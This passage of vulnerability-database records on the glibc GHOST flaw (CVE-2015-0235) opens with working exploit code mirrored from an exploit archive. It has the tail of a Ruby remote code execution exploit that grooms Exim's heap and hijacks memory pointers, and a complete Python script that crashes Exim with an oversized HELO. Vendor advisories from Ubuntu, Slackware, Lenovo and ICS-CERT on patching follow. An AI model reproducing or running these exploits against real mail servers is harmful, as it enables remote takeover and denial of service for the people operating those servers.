512 : 768) # at least request2size(sizeof(FILE))\r\n heap_shift = min_heap_shift + rand(1024 - min_heap_shift)\r\n last_digit = 1 + rand(9)\r\n \r\n smtp_connect\r\n \r\n # fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE -\r\n \"501 : sender address must contain a domain\\r\\n\\0\".length)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n \r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n \r\n # / 5, because \"\\x7F\" is non-print, and:\r\n # ss = store_get(length + nonprintcount * 4 + 1);\r\n smtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1)\r\n smtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE\r\n \r\n # auth_xtextdecode() is the only way to overwrite the beginning of a\r\n # current_block of memory (the \"storeblock\" structure) with arbitrary data\r\n # (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters).\r\n # this shapes the rest of our exploit: we overwrite 
the beginning of the\r\n # current_block of POOL_PERM memory with the current_block of POOL_MAIN\r\n # memory (allocated by auth_xtextdecode()).\r\n \r\n auth_prefix = rand_text_alpha(x86 ? 11264 : 11280)\r\n (x86 ? 4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) }\r\n auth_prefix += \".\"\r\n \r\n # also fill log_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030)\r\n smtp_recv(501, 'invalid data for AUTH')\r\n \r\n smtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len)\r\n begin\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] !~ /#{HELO_CODES}/\r\n return reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/\r\n \r\n smtp_send(\"MAIL FROM:<>\")\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] != \"250\"\r\n \r\n smtp_send(\"RCPT TO:<postmaster>\")\r\n reply = smtp_recv\r\n return reply\r\n \r\n rescue\r\n return nil\r\n end\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\r\n DOT = '[.]'\r\n \r\n def smtp_connect(exploiting = true)\r\n fail_with(\"smtp_connect\", \"sock isn't nil\") if sock\r\n \r\n connect\r\n fail_with(\"smtp_connect\", \"sock is nil\") if not sock\r\n @smtp_state = :recv\r\n \r\n banner = smtp_recv(220)\r\n return if not exploiting\r\n \r\n sender_host_address = datastore['SENDER_HOST_ADDRESS']\r\n if sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil?\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\")\r\n end\r\n sender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\"\r\n \r\n # turn helo_seen on (enable the MAIL command)\r\n # call smtp_verify_helo() (force fopen() and small 
malloc()s)\r\n # call host_find_byname() (force gethostbyname's initial 1024-byte malloc())\r\n smtp_send(\"HELO #{sender_host_address_octal}\")\r\n reply = smtp_recv(HELO_CODES)\r\n \r\n if reply[:code] != \"250\"\r\n fail_with(\"smtp_connect\", \"not Exim?\") if reply[:lines].first !~ /argument does not match calling host/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\")\r\n end\r\n \r\n if reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3\r\n smtp_active_hostname = $1\r\n sender_host_name = $2\r\n \r\n if sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn\r\n sender_host_name = $2\r\n sender_ident = $1\r\n else\r\n sender_ident = nil\r\n end\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal\r\n \r\n else\r\n # can't double-check sender_host_address here, so only for advanced users\r\n fail_with(\"smtp_connect\", \"user-supplied EHLO greeting\") unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n # worst-case scenario\r\n smtp_active_hostname = \"A\" * NS_MAXDNAME\r\n sender_host_name = \"A\" * NS_MAXDNAME\r\n sender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127));\r\n end\r\n \r\n _sender = @sender\r\n @sender = {\r\n hostaddr: sender_host_address,\r\n hostaddr8: sender_host_address_octal,\r\n hostname: sender_host_name,\r\n ident: sender_ident,\r\n __smtp_active_hostname: smtp_active_hostname\r\n }\r\n fail_with(\"smtp_connect\", \"sender changed\") if _sender and _sender != @sender\r\n \r\n # avoid a future pathological case by forcing it now:\r\n # \"Do NOT free the first successor, if our current block has less than 256 bytes left.\"\r\n smtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n \r\n 
smtp_send(\"RSET\")\r\n smtp_recv(250, 'Reset OK')\r\n end\r\n \r\n def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)\r\n fail_with(\"smtp_send\", \"state is #{@smtp_state}\") if @smtp_state != :send\r\n @smtp_state = :sending\r\n \r\n if not arg_pattern\r\n fail_with(\"smtp_send\", \"prefix is nil\") if not prefix\r\n fail_with(\"smtp_send\", \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length\r\n command = prefix\r\n \r\n else\r\n fail_with(\"smtp_send\", \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length\r\n length = arg_length - arg_prefix.length - arg_suffix.length\r\n fail_with(\"smtp_send\", \"len is #{length}\") if length <= 0\r\n argument = arg_prefix\r\n case arg_pattern\r\n when String\r\n argument += arg_pattern * (length / arg_pattern.length)\r\n argument += arg_pattern[0, length % arg_pattern.length]\r\n when Method\r\n argument += arg_pattern.call(length)\r\n end\r\n argument += arg_suffix\r\n fail_with(\"smtp_send\", \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length\r\n command = prefix + argument + suffix\r\n end\r\n \r\n fail_with(\"smtp_send\", \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0\r\n fail_with(\"smtp_send\", \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE\r\n command += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer\r\n \r\n # the following loop works around a bug in the put() method:\r\n # \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\"\r\n # (or send_idx and/or send_len could be removed altogether, like here)\r\n \r\n while command and not command.empty?\r\n num_sent = sock.put(command)\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}\") if num_sent <= 0\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length\r\n 
command = command[num_sent..-1]\r\n end\r\n \r\n @smtp_state = :recv\r\n end\r\n \r\n def smtp_recv(expected_code = nil, expected_data = nil)\r\n fail_with(\"smtp_recv\", \"state is #{@smtp_state}\") if @smtp_state != :recv\r\n @smtp_state = :recving\r\n \r\n failure = catch(:failure) do\r\n \r\n # parse SMTP replies very carefully (the information\r\n # leak injects arbitrary data into multiline replies)\r\n \r\n data = \"\"\r\n while data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn\r\n begin\r\n more_data = sock.get_once\r\n rescue\r\n throw(:failure, \"Caught #{$!.class}: #{$!.message}\")\r\n end\r\n throw(:failure, \"no more data\") if more_data.nil?\r\n throw(:failure, \"no more data\") if more_data.empty?\r\n data += more_data\r\n end\r\n \r\n throw(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0\r\n lines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn)\r\n throw(:failure, \"malformed reply (empty)\") if lines.empty?\r\n \r\n code = nil\r\n lines.size.times do |i|\r\n lines[i].sub!(/\\A\\r\\n/mn, \"\")\r\n lines[i] += \"\\r\\n\"\r\n \r\n if i == 0\r\n code = lines[i][0,3]\r\n throw(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn\r\n if expected_code and code !~ /\\A(#{expected_code})\\z/mn\r\n throw(:failure, \"unexpected #{code}, expected #{expected_code}\")\r\n end\r\n end\r\n \r\n line_begins_with = lines[i][0,4]\r\n line_should_begin_with = code + (i == lines.size-1 ? 
\" \" : \"-\")\r\n \r\n if line_begins_with != line_should_begin_with\r\n throw(:failure, \"line begins with #{line_begins_with}, \" \\\r\n \"should begin with #{line_should_begin_with}\")\r\n end\r\n end\r\n \r\n throw(:failure, \"malformed reply (join)\") if lines.join(\"\") != data\r\n if expected_data and data !~ /#{expected_data}/mn\r\n throw(:failure, \"unexpected data\")\r\n end\r\n \r\n reply = { code: code, lines: lines }\r\n @smtp_state = :send\r\n return reply\r\n end\r\n \r\n fail_with(\"smtp_recv\", \"#{failure}\") if expected_code\r\n return nil\r\n end\r\n \r\n def smtp_disconnect\r\n disconnect if sock\r\n fail_with(\"smtp_disconnect\", \"sock isn't nil\") if sock\r\n @smtp_state = :disconnected\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23392"}, {"lastseen": "2018-01-01T20:59:43", "bulletinFamily": "exploit", "description": "Exim ESTMP denial of service exploit that leverages the GHOST glibc gethostbyname buffer overflow.", "modified": "2015-01-29T00:00:00", "published": "2015-01-29T00:00:00", "id": "1337DAY-ID-23215", "href": "https://0day.today/exploit/description/23215", "type": "zdt", "title": "Exim ESMTP GHOST Denial Of Service Exploit", "sourceData": "The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash.\r\n\r\n#!/usr/bin/python\r\n# Exim ESMTP DoS Exploit by 1N3 v20150128\r\n# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow\r\n# http://crowdshield.com\r\n#\r\n# USAGE: python ghost-smtp-dos.py <ip> <port>\r\n#\r\n# Escape character is '^]'.\r\n# 220 debian-7-7-64b ESMTP Exim 4.80 ...\r\n# HELO\r\n# 
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n# Connection closed by foreign host.\r\n#\r\n# user () debian-7-7-64b:~$ dmesg\r\n# ...\r\n# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in\r\n# libc-2.13.so[7fabef2a2000+182000]\r\n\r\nimport socket\r\nimport time\r\nimport sys, getopt\r\n\r\ndef main(argv):\r\n argc = len(argv)\r\n\r\n if argc <= 1:\r\n print \"usage: %s <host>\" % (argv[0])\r\n sys.exit(0)\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n buffer = 
\"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\r\n target = argv[1] # SET TARGET\r\n port = argv[2] # SET PORT\r\n\r\n print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"\r\n print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connect=s.connect((target,int(port)))\r\n data = s.recv(1024)\r\n print \"CONNECTION: \" +data\r\n s.send('HELO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.send('EHLO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.close()\r\n\r\nmain(sys.argv)\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23215"}], "ubuntu": [{"lastseen": "2018-08-31T00:09:42", "bulletinFamily": "unix", "description": "It was discovered that a buffer overflow existed in the gethostbyname and gethostbyname2 functions in the GNU C Library. An attacker could use this issue to execute arbitrary code or cause an application crash, resulting in a denial of service.", "modified": "2015-01-27T00:00:00", "published": "2015-01-27T00:00:00", "id": "USN-2485-1", "href": "https://usn.ubuntu.com/2485-1/", "title": "GNU C Library vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-08-31T00:36:43", "bulletinFamily": "unix", "description": "New glibc packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\nand 14.1 to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/glibc-2.17-i486-10_slack14.1.txz: Rebuilt.\n This update patches a security issue __nss_hostname_digits_dots() function\n of glibc which may be triggered through the gethostbyname*() set of\n functions. This flaw could allow local or remote attackers to take control\n of a machine running a vulnerable version of glibc. 
Thanks to Qualys for\n discovering this issue (also known as the GHOST vulnerability.)\n For more information, see:\n https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235\n (* Security fix *)\npatches/packages/glibc-i18n-2.17-i486-10_slack14.1.txz: Rebuilt.\npatches/packages/glibc-profile-2.17-i486-10_slack14.1.txz: Rebuilt.\npatches/packages/glibc-solibs-2.17-i486-10_slack14.1.txz: Rebuilt.\npatches/packages/glibc-zoneinfo-2014j-noarch-1.txz: Upgraded.\n Upgraded to tzcode2014j and tzdata2014j.\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg glibc-*", "modified": "2015-01-28T12:35:21", "published": "2015-01-28T12:35:21", "id": "SSA-2015-028-01", "href": 
"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.1260924", "title": "glibc", "type": "slackware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "lenovo": [{"lastseen": "2018-02-21T17:01:58", "bulletinFamily": "info", "description": "**Lenovo Security Advisory:** LEN-2015-007 \n \n**Potential Impact:** Execution of Arbitrary Code \n \n**Severity:** High \n \n**Summary:** \nA vulnerability has been found in the GNU C Library (glibc) __nss_hostname_digits_dots() function that allows both local and remote users to cause a buffer overflow in network function calls gethostbyname() and gethostbyname2(). The media is referring to this vulnerability as \u201cGHOST.\u201d \n \nImmediate patches are required to fix the vulnerability in the glibc that allow arbitrary code execution from unauthenticated users. It is necessary to restart computers or process following the patches. \n \n**Description:** \nAccording to Qualys, the vulnerability is \"a buffer overflow in the _ __nss_hostname_digits_dots()_ function of the GNU C Library (_glibc_). This bug is reachable both locally and remotely via the _gethostbyname*()_ functions\" and furthermore, \"arbitrary code execution can be achieved\" by use of the buffer overflow. The vulnerability exists in any systems relying on the function in the GNU C Library gethostbyname() and gethostbyname2() functions. 
There is currently proof of concept code available to exploit this code.\n\n**Affected Products:**\n\nThinkPad\n\nSystem | Status \n---|--- \nThinkPad Edge E130 | Not affected \nThinkPad Edge E145 | Not affected \nThinkPad Edge E431/E531 | Not affected \nThinkPad Edge E440/E540 | Not affected \nThinkPad Edge E455/E555 | Not affected \nThinkPad Edge S430 | Not affected \nThinkPad Helix | Not affected \nThinkPad L430/L530 | Not affected \nThinkPad L440/L540 | Not affected \nThinkPad S1 Yoga (Non-vPro) | Not affected \nThinkPad S1 Yoga (vPro) | Not affected \nThinkPad S431 | Not affected \nThinkPad S440 | Not affected \nThinkPad S531 | Not affected \nThinkPad S540 | Not affected \nThinkPad T430 | Not affected \nThinkPad T430s | Not affected \nThinkPad T430u | Not affected \nThinkPad T431s | Not affected \nThinkPad T440/T440s | Not affected \nThinkPad T440p | Not affected \nThinkPad T530 | Not affected \nThinkPad T540p | Not affected \nThinkPad Tablet 10 (32-bit) | Not affected \nThinkPad Tablet 10 (64-bit) | Not affected \nThinkPad Tablet 2 | Not affected \nThinkPad Tablet 8 (32-bit) | Not affected \nThinkPad Tablet 8 (64-bit) | Not affected \nThinkPad Twist/Edge S230 | Not affected \nThinkPad W530 | Not affected \nThinkPad W540 | Not affected \nThinkPad X1 Carbon (20A7,20A8) | Not affected \nThinkPad X1 Carbon (34xx) | Not affected \nThinkPad X131e (AMD) | Not affected \nThinkPad X131e (Intel) | Not affected \nThinkPad X140e (AMD) | Not affected \nThinkPad X230 | Not affected \nThinkPad X230s | Not affected \nThinkPad X230t | Not affected \nThinkPad X240/X240s | Not affected \nThinkPad Yoga 11e | Not affected \n \nThinkCentre\n\nSystem | Status \n---|--- \nThinkCentre E73Z | Not affected \nThinkCentre E93 | Not affected \nThinkCentre E93Z | Not affected \nThinkCentre Edge 62z | Not affected \nThinkCentre Edge 72 | Not affected \nThinkCentre Edge 72z | Not affected \nThinkCentre Edge 92z | Not affected \nThinkCentre M62Z | Not affected \nThinkCentre M72e | Not 
affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72z | Not affected \nThinkCentre M73 | Not affected \nThinkCentre M73 Tiny | Not affected \nThinkCentre M73Z | Not affected \nThinkCentre M78 (type 1562, 1565, 1662, 1663, 1766, 2111, 2113, 2114, 4860, 4863, 4865, 4866, 5100) | Not affected \nThinkCentre M78 (type 10BN, 10BQ, 10BR, 10BS, 10BT, 10BU) | Not affected \nThinkCentre M83 | Not affected \nThinkCentre M83Z | Not affected \nThinkCentre M90 | Not affected \nThinkCentre M90p | Not affected \nThinkCentre M91 | Not affected \nThinkCentre M91P | Not affected \nThinkCentre M92 | Not affected \nThinkCentre M92P | Not affected \nThinkCentre M92Z | Not affected \nThinkCentre M93 | Not affected \nThinkCentre M93P | Not affected \nThinkCentre M93Z | Not affected \n \nThinkStation\n\nSystem | Status \n---|--- \nThinkStation C30 \n(type 1095, 1096, 1097) | Not affected \nThinkStation C30 \n(type 1136, 1137) | Not affected \nThinkStation D30 \n(type 4223, 4228, 4229) | Not affected \nThinkStation D30 \n(type 4353, 4354) | Not affected \nThinkStation E31 | Not affected \nThinkStation E32 | Not affected \nThinkStation P300 | Not affected \nThinkStation P500 | Not affected \nThinkStation P700 | Not affected \nThinkStation P900 | Not affected \nThinkStation S30 | Not affected \nThinkStation S30 | Not affected \n \nThinkServer & Storage\n\nSystem | Status | Minimum version \nincluding Fix | Link \n---|---|---|--- \nThinkServer RD330 | Not affected | \u2212 | \u2212 \nThinkServer RD340 | Not affected | \u2212 | \u2212 \nThinkServer RD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70692> \nThinkServer RD430 | Not affected | \u2212 | \u2212 \nThinkServer RD440 | Not affected | \u2212 | \u2212 \nThinkServer RD450 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70693> \nThinkServer RD530 | Not affected | \u2212 | \u2212 \nThinkServer RD540 
| Not affected | \u2212 | \u2212 \nThinkServer RD550 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70694> \nThinkServer RD630 | Not affected | \u2212 | \u2212 \nThinkServer RD640 | Not affected | \u2212 | \u2212 \nThinkServer RD650 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70695> \nThinkServer RS140 | Not affected | \u2212 | \u2212 \nThinkServer TD340 | Not affected | \u2212 | \u2212 \nThinkServer TD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70696> \nThinkServer TS130 | Not affected | \u2212 | \u2212 \nThinkServer TS140 | Not affected | \u2212 | \u2212 \nThinkServer TS430 | Not affected | \u2212 | \u2212 \nThinkServer TS440 | Not affected | \u2212 | \u2212 \nThinkStorage SA120 | Not affected | \u2212 | \u2212 \n \nLenovo EMC\n\nSystem | Status \n---|--- \nLenovoEMC EZ Media & Backup (hm3) | Not affected \nLenovoEMC Home Media Cloud Edition (hm2) | Not affected \nLenovoEMC ix12-300r | Not affected \nLenovoEMC ix2 (inc DL) | Not affected \nLenovoEMC ix2-200 | Not affected \nLenovoEMC ix2-200 Cloud Edition | Not affected \nLenovoEMC ix4-200d | Not affected \nLenovoEMC ix4-200d (2.1.x firmware) | Not affected \nLenovoEMC ix4-200d Cloud Edition | Not affected \nLenovoEMC ix4-300d (inc DL) | Not affected \nLenovoEMC px12-350r | Not affected \nLenovoEMC px12-400r | Not affected \nLenovoEMC px12-450r | Not affected \nLenovoEMC px2-300d (inc NVR) | Not affected \nLenovoEMC px4-300d (inc NVR) | Not affected \nLenovoEMC px4-300r | Not affected \nLenovoEMC px4-400d (inc NVR) | Not affected \nLenovoEMC px4-400r | Not affected \nLenovoEMC px6-300d | Not affected \n \nSoftware\n\nApplication | Status \n---|--- \nDeploy Manager | Not affected \nDiagnostic | Not affected \nEasy Manager | Not affected \nEasy Updater | Not affected \nEnergy manager | Not affected \nOSPUT | Not affected \nPartner Pack | Not affected \nPower 
Planner | Not affected \nTSMCLI | Not affected \n \n**Acknowledgements:**\n\n**Other information and references:**\n\n * CERT Vulnerability Note: [VU#967332](<http://www.kb.cert.org/vuls/id/967332>)\n * CVE ID: [CVE-2015-0235](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>)\n\n**Revision History:**\n\n**Revision ** | **Date** | **Description ** \n---|---|--- \n1.2 | 2015-06-29 | Publish additional fixes \n1.1 | 2015-03-03 | Publish additional fixes \n1.0 | 2015-02-16 | Initial release\n", "modified": "2016-07-22T00:00:00", "published": "2016-07-22T00:00:00", "id": "LENOVO:PS500043-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ghost", "type": "lenovo", "title": "GNU C Library (glibc) __nss_hostname_digits_dots() function vulnerable to buffer overflow (\"GHOST\")", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ics": [{"lastseen": "2018-08-31T01:37:45", "bulletinFamily": "info", "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-15-064-01 Siemens SIMATIC HMI Basic, SINUMERIK, and Ruggedcom APE GHOST Vulnerability that was published March 5, 2015, on the NCCIC/ICS-CERT web site.\n\nThe \u201cGHOST\u201da vulnerability in the glibc library affects the Siemens SINUMERIK and SIMATIC HMI Basic applications. 
Siemens has produced an update for SINUMERIK that mitigates this vulnerability.\n\n### **\\--------- Begin Update A Part 1 of 2 -------- **\n\nSiemens has released an update for SIMATIC HMI Basic Panels.\n\n### **\\--------- End Update A Part 1 of 2 --------** \n\n\n## AFFECTED PRODUCTS\n\nThe following SINUMERIK and SIMATIC HMI Basic versions are affected:\n\n * SINUMERIK 808D, 828D, 840D sl, all versions up to 4.7, and\n * SIMATIC HMI Basic Panels 2nd Generation.\n\nThe following Ruggedcom APE versions are not vulnerable in their default configuration, but can become exploitable depending on components installed and user configuration:\n\nRuggedcom APE: APE1402-XX, APE1402-C01, APE1404-XX, APE1404-C01, all versions.\n\n## IMPACT\n\nAn authenticated local user could cause a denial of service of the targeted system by exploiting this vulnerability.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nThe affected products, SINUMERIK, SIMATIC HMI Basic, and Ruggedcom, are used as an interface between operators and corresponding systems, as well as the ability to run third-party components. These products are deployed across several sectors including: Chemical, Energy, Food and Agriculture, and Water and Wastewater Systems. Siemens estimates that these products are used primarily in the United States and Europe with a small percentage in Asia.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER INPUT VALIDATIONb\n\nIncorrect parsing within the glibc library functions \u201cgethostbyname()\u201d and \u201cgethostbyname2()\u201d could cause a denial of service of the targeted system.\n\nCVE-2015-0235c has been assigned to this vulnerability. 
A CVSS v2 base score of 4.6 has been assigned; the CVSS vector string is (AV:L/AC:L/Au:S/C:N/I:N/A:C).d\n\n#### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nIn order to exploit the SINUMERIK and SIMATIC HMI Basic products, an attacker would first need to have authenticated local access to the device(s). To exploit the Ruggedcom APE product an attacker would need to be able to influence parameters passed to the vulnerable functions. This is only possible if the user has installed components that utilize the vulnerable functions and that are accessible to the attacker.\n\n#### EXISTENCE OF EXPLOIT\n\nNo known public exploits specifically target these products. However, public exploits for the \u201cGHOST\u201d vulnerability do exist.\n\n#### DIFFICULTY\n\nAn attacker with local access and a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nSiemens has released security advisory SSA-994726 at the following location: <http://www.siemens.com/cert/advisories>\n\nSiemens has provided updates for the following products and encourages customers to upgrade the products to the newest version:\n\n * SINUMERIK Controllers \u2013 Contact your local Siemens account manager for the update.\n * For Version V2.7: update to V2.7 SP4 Hotfix 3\n * For Version V4.5: update to V4.5 SP4 Hotfix 4\n * For Version V4.7: update to V4.7 SP1\n * Ruggedcom APE: APE1402-XX, APE1402-C01, APE1404-XX, APE1404-C01, All versions. Upgrade information is available at:\n\n<https://support.industry.siemens.com/cs/#document/109474273?lc=en-WW>\n\n### **\\--------- Begin Update A Part 2 of 2 --------**\n\n * SIMATIC HMI Basic Panels 2nd Generation\n * Siemens has released an update and updated its security advisory SSA-994726. 
